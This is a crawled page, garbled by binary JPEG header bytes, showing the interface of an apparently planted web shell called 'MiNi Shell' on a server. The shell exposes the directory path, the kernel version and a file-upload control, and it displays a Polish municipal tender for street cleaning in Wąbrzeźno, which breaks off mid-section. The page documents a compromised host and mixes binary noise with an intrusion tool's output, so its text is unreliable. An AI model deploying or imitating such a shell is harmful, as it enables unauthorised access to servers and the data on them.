JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20230802/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20230802/0033722101-N-2023.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Oczyszczanie i utrzymanie czystości w mieście Wąbrzeźno. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Miasto Wąbrzeźno</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 871118780</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Wolności 18</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Wąbrzeźno</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">87-200</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">kujawsko-pomorskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL616 - Grudziądzki</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zp@wabrzezno.com</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.bip.wabrzezno.com</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Oczyszczanie i utrzymanie czystości w mieście Wąbrzeźno. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-7cbe8606-3111-11ee-a60c-9ec5599dddc1</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2023/BZP 00337221</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2023-08-02</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2023/BZP 00019912/02/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.3 Oczyszczanie i utrzymanie czystości w mieście Wąbrzeźno</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/pn/wabrzezno <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">Komunikacja w postępowaniu o udzielenie zamówienia, w tym składanie ofert,<br/>wymiana informacji oraz przekazywanie dokumentów lub oświadczeń między zamawiającym a wykonawcą odbywa się w języku<br/>polskim wyłącznie przy użyciu środków komunikacji elektronicznej za pośrednictwem platformazakupowa.pl pod adresem:<br/>https://platformazakupowa.pl/pn/wabrzezno/proceedings</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. Zamawiający, zgodnie z<br/>rozporządzeniem Prezesa Rady Ministrów z dnia 30 grudnia 2020 r. w sprawie sposobu sporządzania i przekazywania informacji<br/>oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie<br/>zamówienia publicznego lub konkursie (Dz. U. z 2020 r. poz. 2452), określa niezbędne wymagania sprzętowo – aplikacyjne,<br/>umożliwiające pracę na platformazakupowa.pl, tj.:<br/>1) stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż 512 kb/s,<br/>2) komputer klasy PC lub MAC o następującej konfiguracji: pamięć min. 2 GB Ram, procesor Intel IV 2 GHZ lub jego nowsza wersja,<br/>jeden z systemów operacyjnych – MS Windows 7, Mac Os x 10 4, Linux, lub ich nowsze wersje,<br/>3) zainstalowana dowolna przeglądarka internetowa, w przypadku Internet Explorer minimalnie wersja 10 0,<br/>4) włączona obsługa JavaScript,<br/>5) zainstalowany program Adobe Acrobat Reader lub inny obsługujący format plików .pdf,<br/>6) platformazakupowa.pl działa według standardu przyjętego w komunikacji sieciowej – kodowanie UTF8,<br/>7) oznaczenie czasu odbioru danych przez platformę zakupową stanowi datę oraz dokładny czas (hh:mm:ss) generowany wg czasu<br/>lokalnego serwera synchronizowanego z zegarem Głównego Urzędu Miar.<br/>2. Wykonawca, przystępując do przedmiotowego postępowania o udzielenie zamówienia publicznego:<br/>a) akceptuje warunki korzystania z platformazakupowa.pl określone w Regulaminie zamieszczonym na stronie internetowej pod<br/>linkiem w zakładce „Regulamin&#34; oraz uznaje go za wiążący,<br/>b) zapoznał i stosuje się do Instrukcji składania ofert/wniosków dostępnej pod adresem:<br/>https://drive.google.com/file/d/1Kd1DttbBeiNWt4q4slS4t76lZVKPbkyD/view<br/>3. Zamawiający nie ponosi odpowiedzialności za złożenie oferty w sposób niezgodny z Instrukcją korzystania z<br/>platformazakupowa.pl w szczególności za sytuację, gdy zamawiający zapozna się z treścią oferty przed upływem terminu składania<br/>ofert (np. złożenie oferty w zakładce: „Wyślij wiadomość do zamawiającego”). Taka oferta zostanie uznana przez zamawiającego za<br/>ofertę handlową i nie będzie brana pod uwagę w przedmiotowym postępowaniu ponieważ nie został spełniony obowiązek narzucony<br/>w art. 221 ustawy Pzp.<br/>4. Zamawiający informuje, że instrukcje korzystania z platformazakupowa.pl dotyczące w szczególności logowania, składania<br/>wniosków o wyjaśnienie treści SWZ, składania ofert oraz innych czynności podejmowanych w niniejszym postępowaniu przy użyciu<br/>platformazakupowa.pl znajdują się w zakładce „Instrukcje dla Wykonawców&#34; na stronie internetowej pod adresem:<br/>https://platformazakupowa.pl/strona/45-instrukcje.<br/>Formaty plików wykorzystywanych przez wykonawców powinny być zgodne<br/>z „OBWIESZCZENIEM PREZESA RADY MINISTRÓW z dnia 9 listopada 2017 r. w sprawie ogłoszenia jednolitego tekstu<br/>rozporządzenia Rady Ministrów w sprawie Krajowych Ram Interoperacyjności, minimalnych wymagań dla rejestrów publicznych i<br/>wymiany informacji w postaci elektronicznej oraz minimalnych wymagań dla systemów teleinformatycznych” (Dz. U. z 2017 r. poz.<br/>2247 ze zm.).</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych osobowych),<br/>dalej „RODO”, informuję, że:<br/>1. Administratorem Pani/ Pana danych osobowych jest Gmina Miasto Wąbrzeźno,<br/>2. sprawach dotyczących przetwarzania Pani/ Pana danych reprezentowana przez Burmistrza Wąbrzeźna, z siedzibą w Wąbrzeźnie przy ul. Wolności 18, 87 – 200 Wąbrzeźno, e-mail: sekretariat@wabrzezno.com,<br/>3. Wyznaczono Inspektora Ochrony Danych w Urzędzie Miasta Wąbrzeźno, e-mail: iod@wabrzezno.com Inspektor to osoba, z którą możesz się kontaktować we wszystkich osobowych oraz korzystania z przysługujących Pani/ Panu praw związanych<br/>z przetwarzaniem danych,<br/>4. Pani/Pana dane osobowe przetwarzane będą w celu związanym z postępowaniem o udzielenie zamówienia publicznego pn.:<br/>„Oczyszczanie i utrzymanie czystości w mieście Wąbrzeźno” znak sprawy ZP.271.8.2023, prowadzonym w trybie podstawowym bez możliwości negocjacji (podst. art. 6 ust. 1 lit c RODO) oraz zawarcia i realizacji umowy w przypadku wyboru oferty najkorzystniejszej (na podstawie art. 6 ust. 1 lit b RODO),<br/>5. Odbiorcami Pani/Pana danych osobowych będą lub mogą być osoby lub podmioty, którym udostępniona zostanie dokumentacja<br/>postępowania w oparciu o art. 18 oraz art. 74 ust. 1 ustawy z dnia 11 września 2019 r. – Prawo zamówień publicznych, dalej ustawa<br/>Pzp, ponadto organom, podmiotom upoważnionym na podstawie przepisów prawa (w tym organy ścigania i kontroli), osobom i<br/>podmiotom pisemnie upoważnionym przez Administratora oraz podmiotom wykonującym zadania na zlecenie Administratora w<br/>ramach świadczenia usług i serwisu (np. kancelaria prawna, podmiot obsługujący korespondencję, hostingodawca poczty i stron internetowych),<br/>6. Pani/ Pana dane osobowe przechowywane przez okres:<br/>a) pięciu lat kalendarzowych począwszy od dnia pierwszego stycznia roku następnego od zakończenia postępowania o udzielenie zamówienia (dotyczy dokumentacji zamówienia publicznego);<br/>b) dziesięciu lat kalendarzowych począwszy od dnia pierwszego stycznia roku następnego, liczonego od daty zakończenia trwania<br/>umowy (dotyczy umowy o udzielenie zamówienia publicznego)<br/>- zgodnie z rozporządzeniem w sprawie instrukcji kancelaryjnej, jednolitych rzeczowych wykazów akt oraz instrukcji w sprawie<br/>organizacji i zakresu działania archiwów zakładowych.<br/>7. Obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym<br/>określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego. Konsekwencją niepodania danych będzie uniemożliwienie udziału w postępowaniu.<br/>8. W odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany w tym również w<br/>formie profilowania.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">9. Posiada Pani/Pan:<br/>a) prawo dostępu do danych osobowych Pani/Pana dotyczących,<br/>b) prawo do sprostowania Pani/Pana danych osobowych – gdy dane są nieprawidłowe lub niekompletne,<br/>c) prawo żądania od administratora usunięcia danych osobowych (tzw. prawo do bycia zapomnianym), w przypadku, gdy:<br/>• dane nie są już niezbędne do celów, dla których były zebrane lub w inny sposób przetwarzane,<br/>• osoba, której dane dotyczą, wniosła sprzeciw wobec przetwarzania danych osobowych,<br/>• osoba, której dane dotyczą wycofała zgodę na przetwarzanie danych osobowych, która jest podstawą przetwarzania danych i nie<br/>ma innej podstawy prawnej przetwarzania danych,<br/>• dane osobowe przetwarzane są niezgodnie z prawem,<br/>• dane osobowe muszą być usunięte w celu wywiązania się z obowiązku wynikającego z przepisów prawa;<br/>d) prawo do żądania ograniczenia przetwarzania danych osobowych – w przypadku, gdy:<br/>• osoba, której dane dotyczą kwestionuje prawidłowość danych osobowych,<br/>• przetwarzanie danych jest niezgodne z prawem, a osoba, której dane dotyczą, sprzeciwia się usunięciu danych, żądając w zamian<br/>ich ograniczenia,<br/>• Administrator nie potrzebuje już danych dla swoich celów, ale osoba, której dane dotyczą, potrzebuje ich do ustalenia, obrony lub<br/>dochodzenia roszczeń,<br/>• osoba, której dane dotyczą, wniosła sprzeciw wobec przetwarzania danych, do czasu ustalenia czy prawnie uzasadnione podstawy<br/>po stronie administratora są nadrzędne wobec podstawy sprzeciwu,<br/>• prawo do przenoszenia danych – w przypadku gdy łącznie spełnione są następujące przesłanki:<br/>- przetwarzanie danych odbywa się na podstawie umowy zawartej z osobą, której dane dotyczą lub na podstawie zgody wyrażonej<br/>przez tą osobę,<br/>- przetwarzanie odbywa się w sposób zautomatyzowany;<br/>d) prawo sprzeciwu wobec przetwarzania danych – w przypadku gdy łącznie spełnione są następujące przesłanki:<br/>• zaistnieją przyczyny związane z Pani/Pana szczególną sytuacją, w przypadku przetwarzania danych na podstawie zadania<br/>realizowanego w interesie publicznym lub w ramach sprawowania władzy publicznej przez Administratora,<br/>• przetwarzanie jest niezbędne do celów wynikających z prawnie uzasadnionych interesów realizowanych przez Administratora lub<br/>przez stronę trzecią, z wyjątkiem sytuacji, w których nadrzędny charakter wobec tych interesów mają interesy lub podstawowe prawa<br/>i wolności osoby, której dane dotyczą, wymagające ochrony danych osobowych;<br/>e) prawo wniesienia skargi do organu nadzorczego zajmującego się ochroną danych osobowych, tj. Prezesa Urzędu Ochrony<br/>Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO,<br/>f) prawo do cofnięcia tej zgody w dowolnym momencie (w przypadku gdy przetwarzanie danych osobowych odbywa się na<br/>podstawie zgody). Cofnięcie to nie ma wpływu na zgodność przetwarzania, którego dokonano na podstawie zgody przed jej<br/>cofnięciem, z obowiązującym prawem.<br/>Do obowiązków Wykonawcy należą m.in. obowiązki wynikające z RODO, w szczególności obowiązek informacyjny przewidziany w<br/>art. 13 RODO względem osób fizycznych, których dane osobowe dotyczą i od których dane te wykonawca bezpośrednio pozyskał.<br/>Jednakże obowiązek informacyjny wynikający z art. 13 RODO nie będzie miał zastosowania, gdy i w zakresie, w jakim osoba<br/>fizyczna, której dane dotyczą, dysonuje już tymi danymi informacyjnymi (vide: art. 13 ust. 4 RODO). Ponadto wykonawca będzie<br/>musiał wypełnić obowiązek informacyjny wynikający z art. 14 RODO względem osób fizycznych, których dane przekazuje<br/>zamawiającemu i których dane bezpośrednio pozyskał, chyba że ma zastosowanie co najmniej jedno z wyłączeń, o których mowa w<br/>art. 14 ust. 5 RODO.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP.271.8.2023</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Oczyszczanie i utrzymanie czystości w mieście Wąbrzeżno.<br/>1.	Zadanie to obejmuje:<br/>1)	bieżące utrzymanie czystości ulic, chodników, pieszo-jezdni, parkingów, ażurowych miejsc postoju, placów, ścieżek rowerowych i dojazdów do nich, przystanków komunikacji miejskiej poprzez zamiatanie mechaniczne lub ręczne;<br/>2)	koszenie trawy przylegającej do utrzymywanego pasa drogowego, do granic nieruchomości oraz zebranie skoszonej trawy zgodnie z zał. nr 1 harmonogramu. Max. wysokość trawy do 10 cm. W okresie suszy obcinanie odrostów innych roślin wystających ponad wysokość trawy;<br/>3)	wywóz zebranych odpadów do Regionalnej Instalacji Przetwarzania Odpadów Komunalnych;<br/>4)	oczyszczanie jezdni, chodników, ścieżek pieszo-rowerowych, parkingów, placów oraz przystanków komunikacji miejskiej oraz kratek ściekowych wód opadowych w ulicach z chwastów z możliwością zastosowania środków chemicznych raz w miesiącu;<br/>5)	oczyszczanie z liści, śniegu, lodu i błota nawierzchni dróg, chodników, placów, parkingów i ścieżek rowerowych, przystanków komunikacji miejskiej oraz kratek ściekowych wód opadowych w ulicach, jak również usuwanie zanieczyszczeń powstałych w wyniku zimowego utrzymania (piasku i innych środków używanych przeciwko gołoledzi);<br/>6)	zwalczanie gołoledzi, przez co rozumie się w szczególności zamarzanie cienkiej warstwy wody, tzw. zamarzanie kropel deszczu, mżawki na powierzchni oziębionego pasa drogowego do temperatury niższej lub nieco wyższej od 0o C;<br/>7)	usuwanie zalegającego na parkingach i poboczach dróg śniegu, jeśli jego ilość spowoduje zakłócenie płynności ruchu w obu kierunkach i uniemożliwi parkowanie samochodów;<br/>8)	zapewnienie przez Wykonawcę, w przypadku wywozu śniegu, specjalistycznego oznakowania (barierki, pachołki, itp.), dla bezpieczeństwa użytkowników ruchu;<br/>9)	zapewnienie dodatkowego sprzątania i koszenia w mieście przed uroczystościami <br/>i świętami zgodnie z poleceniem Zamawiającego, o którym Wykonawca zostanie zawiadomiony przez Zamawiającego na 7 dni przed planowanymi uroczystościami oraz świętami (max. do 7 razy w roku);<br/>10)	przedkładanie przez Wykonawcę, codziennie do godziny 8:00, szczegółowego pisemnego raportu z zaangażowanego sprzętu i ludzi z zakresem zadań do wykonania w danym dniu.<br/>Zamawiający uzyskał dofinansowanie z Rządowego Funduszu POLSKI ŁAD Program Inwestycji Strategicznych w ramach projektu pt.: „Przebudowa dróg na Oś Ptasim i Oś Owocowym w Wąbrzeźnie wraz z przebudową kanalizacji deszczowej”. W ramach tego projektu w trakcie przebudowania są następujące ulice: Wronia, Żurawia, Pawia, Szpakowa, Skowronkowa, Kanarkowa, Sokola, Gołębia, Krucza, Bociania, Jaskółcza, Orla, Słowicza, Jastrzębia, Łabędzia (od Jastrzębiej do Żurawiej), Czereśniowa, Malinowa. Prognozowane zakończenie prac 20 grudnia 2024 r. <br/>Inwestycje polegającą na przebudowie ulic: Jasnej i Wierzbowej w Wąbrzeźnie wraz <br/>z wykonaniem zjazdów na posesje oraz odwodnieniem nawierzchni za pomocą istniejącej kanalizacji deszczowej prognozuje się jej rozpoczęcie w grudniu 2023 r. Prognozowane zakończenie prac w grudniu 2024r. <br/>Inwestycje polegającą na przebudowie ulic: Kasztanowej oraz Podzamcze <br/>w Wąbrzeźnie wraz z wykonaniem zjazdów na posesje oraz odwodnieniem nawierzchni za pomocą istniejącej kanalizacji deszczowej prognozuje się jej rozpoczęcie w grudniu 2023 r. Prognozowane zakończenie prac w grudniu 2024 r. <br/>Inwestycje polegającą na budowie ulicy Żeromskiego dojazd do bloków ADMAR <br/>w Wąbrzeźnie prognozuje się jej rozpoczęcie prac w 2024 roku. Prognozowane zakończenie prac w 2025roku.<br/>Zakończenie budowy ulicy Okrężnej od ul. ks. gen. W. Kiedrowskiego do obwodnicy miasta oraz odcinka ul. Akacjowej od ul. Polnej do nowo budowanej ul. Okrężnej – prognozuje się zakończenie do 31 sierpnia 2023 roku. <br/>Inwestycje polegającą na budowie ulicy Podzamcze, ul. Kasztanowej oraz <br/>ul. Modrzewiowej w Wąbrzeźnie prognozuje się rozpoczęcie i zakończenie w 2024 roku<br/>W tym czasie może nastąpić całkowite lub częściowe wyłączenie ww. ulic z harmonogramu oczyszczania i utrzymania czystości, spowodowane zmianą organizacji ruchu. W związku z tym zamawiający prosi o uwzględnienie powyższych informacji w kalkulowaniu ceny. Po zakończeniu robót budowlanych na ww. ulicach przywrócone zostanie wcześniejsze oczyszczanie i utrzymanie czystości.<br/>Szczegółowo zakres zamówienia został opisany we wzorze umowy będącym Załącznikiem nr 8 do SWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">90610000-6 - Usługi sprzątania i zamiatania ulic</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">90620000-9 - Usługi odśnieżania</p> <p class="mb-0">90630000-2 - Usługi usuwania oblodzeń</p> <p class="mb-0">77310000-6 - Usługi sadzenia roślin oraz utrzymania terenów zielonych</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane: <span class="normal">Zamawiający przewiduje udzielenia zamówień, o których mowa w art. 214 ust. 1 pkt 7 Pzp. Zamówienia te jeśli zamawiający z nich skorzysta będą polegały na zwiększeniu ilości terenów, na jakich na być świadczona usługa lub/i na zleceniu tożsamych usług w okresie w okresie 3 lat od dnia udzielenia zamówienia podstawowego. Wartość tych zamówień nie będzie mogła przekroczyć kwoty 50.000,00 zł netto.</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.	Przy wyborze oferty zamawiający będzie się kierował następującymi kryteriami:<br/><br/>1)	Cena - waga 60 pkt<br/>Kryterium „cena” (C) będzie rozpatrywane na podstawie ceny brutto za wykonanie przedmiotu zamówienia, podanej przez wykonawcę w Formularzu oferty. Ilość punktów w tym kryterium zo-stanie obliczona na podstawie poniższego wzoru<br/>C = (Cn/Co) x 60% x 100<br/>gdzie:<br/>C - ilość punktów przyznanych wykonawcy w kryterium cena <br/>Cn - najniższa zaoferowana cena spośród ofert nie podlegających odrzuceniu <br/>Co – cena zaoferowana w ofercie badanej<br/><br/>Maksymalna liczba punktów jaką może uzyskać wykonawca w kryterium „cena” wynosi 60 pkt<br/><br/>2)	Aspekty środowiskowe – waga 40 pkt <br/>Kryterium „aspekty środowiskowe” ( A ) będzie rozpatrywane na podstawie podanej informa-cji o liczbie pojazdów z Klasyfikacją Emisji Spalin 3,4,5 lub 6 objętych przedmiotem zamówienia, podanej przez wykonawcę w Formularzu oferty.<br/>a)	Wykonawca, który zapewni przy wykonaniu zamówienia:<br/>•	minimum 3 pojazdy z Klasyfikacją Emisji Spalin 3,4,5 lub 6 - otrzyma dodatkowo 20 punktów,<br/>•	więcej niż 3 pojazdy z 